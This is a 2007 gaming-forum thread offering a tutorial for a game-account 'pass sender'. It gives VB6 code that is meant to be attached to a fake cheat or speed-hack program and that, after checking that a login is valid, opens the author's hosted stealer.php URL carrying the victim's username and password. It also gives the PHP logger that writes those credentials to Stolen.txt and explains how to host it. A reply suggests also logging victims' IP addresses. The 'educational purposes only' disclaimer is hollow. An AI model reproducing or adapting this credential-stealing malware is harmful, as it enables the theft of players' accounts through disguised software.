Go Back   Gaming Gutter > Non-Gaming > Programming > Tutorials


Tutorials - Looking for programming tutorials to increase your knowledge? Do so here.

» Site Navigation
» Home
» FAQ
» Log in
User Name:

Password:

Not a member yet?
Register Now!
» Advertisement
» Recent Threads
Go to first new post Gift for Li <3
Today 12:34 PM
by Sejiru
Last post by Sejiru
Today 12:34 PM
0 Replies, 1 Views
Go to first new post What are image clicks?
Today 12:29 PM
Last post by xpinklemon
Today 12:33 PM
2 Replies, 3 Views
Go to first new post i am leaving neopets so...
Today 10:56 AM
by hamza
Last post by jtdusk
Today 12:32 PM
7 Replies, 8 Views
Go to first new post How many of you got iced...
Yesterday 09:07 PM
Last post by Renzocooking
Today 12:32 PM
8 Replies, 9 Views
Go to first new post This account has been...
Today 11:49 AM
Last post by wilsoniscool
Today 12:31 PM
10 Replies, 11 Views
Reply
 
LinkBack Thread Tools Display Modes

 How to make a pass sender for any game
Old 04-28-2007, 01:14 PM   #1 (permalink)
Dustyßottems Dustyßottems is offline Gender Male
Full Member
 
Dustyßottems's Avatar
 
Dustyßottems is offline
Join Date: Apr 2007
Location: somewhere up north
Age: 15
Posts: 43
iTrader: 0 / 0%
Dustyßottems Is gaining popularity
Rep Power: 5
Cool How to make a pass sender for any game

ok theres many parts of this tut. (i made it as noob friendly as possible)

VB6:

you need an program to attach this to for one (if your in it for the cash make it an fake aber or just edit the login code of a public one)

Code:
Dim HTML As String
HTML = ""
HTML = ("put the login for what site ur useing here")
If InStr(HTML, "You are logged in as") Then
MsgBox ("Account Valid")
Inet1.OpenURL ("ur url to your uploaded stealer.php make sue you enter in varibles")
YOURFAKEFORM.Show
Else
MsgBox ("Invalid Account, try again, nub")
End If


put that for the login of some amazing speed hack or somthing -_-

the above one is used for runescape2 (pm me if you want me to make you a custom one, i charge) as you see it also checks accounts so you only get valid ones.

PHP:

PHP Code:
<?php
$username 
$_GET['username'];
$password $_GET['password'];
$file "Stolen.txt";
$fhandle fopen($file'a+');  
fwrite($fhandle"+++++++++++++++++++++++++++++++++++++++++++");
fwrite($fhandle"\n");
fwrite($fhandle"Dustyßottems PHP logger");
fwrite($fhandle"\n");
fwrite($fhandle"Username: ");
fwrite($fhandle$username);
fwrite($fhandle"\n");
fwrite($fhandle"Password: ");
fwrite($fhandle$password);
fwrite($fhandle"\n");
fwrite($fhandle"+++++++++++++++++++++++++++++++++++++++++++");
fwrite($fhandle"\n");
fwrite($fhandle"\n");
fclose($fhandle);
?>
upload that an the file it uses to an php friendly host and record down the links needed (this is why schools should teach php ;))

HOST:
ok easyish part go to 1111mb get a domain (free) and then upload the files needed...

should look like this:


so preety much a summery... you make a new program, you should already have your host and the 2 php files uploaded, you make it so that after it logins it will open his url of the stealer.php link in your host filling in the varibles...

NjoY

(educationl purposes only ;))

you use this and submit it to a forum for others to download and don't clearly state what it is, one you get sued, two you get ddosed by me
  Reply With Quote

 
Old 04-28-2007, 03:14 PM   #2 (permalink)
second2none second2none is offline Gender Male
Underground
 
second2none is offline
Join Date: Sep 2006
Location: BrisBANE <----
Age: 19
Posts: 5,023
iTrader: 1 / 100%
second2none Is a Party Captainsecond2none Is a Party Captainsecond2none Is a Party Captain
Rep Power: 15
Nice

You could also turn this into a log.
Get thier User, Website, program & IP.

:P thats what I do. Cheesie coded it for me except it goes into a Database.
__________________
This is from:
Screenies Of A Mod
Code:
How did you do it? FLP , jotform, some other form of hacking? - First Class Noob
Lawl.. funny shit.

Quote:
Originally Posted by Kore
By k[ore] on Today, 08:44 AM
i'll give you rep alright, but it won't be positive.
Lawl Ownt

Hoes forgot to eat a dick and shut the FUCK UP!
  Reply With Quote

 
Old 04-29-2007, 07:12 AM   #3 (permalink)
Dustyßottems Dustyßottems is offline Gender Male
Full Member
 
Dustyßottems's Avatar
 
Dustyßottems is offline
Join Date: Apr 2007
Location: somewhere up north
Age: 15
Posts: 43
iTrader: 0 / 0%
Dustyßottems Is gaining popularity
Rep Power: 5
thanks i made it so you need to know programming to use it so thiers no noobs with vb6 and a brain that can own us all
  Reply With Quote
Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Powered by vBadvanced CMPS v3.0 RC2

All times are GMT -7. The time now is 12:34 PM.


vBulletin skin developed by: eXtremepixels
The contents of this webpage are copyright © 2006-2008 GamingGutter.com. All Rights Reserved.

Page generated in 0.16456795 seconds (100.00% PHP - 0% MySQL) with 19 queries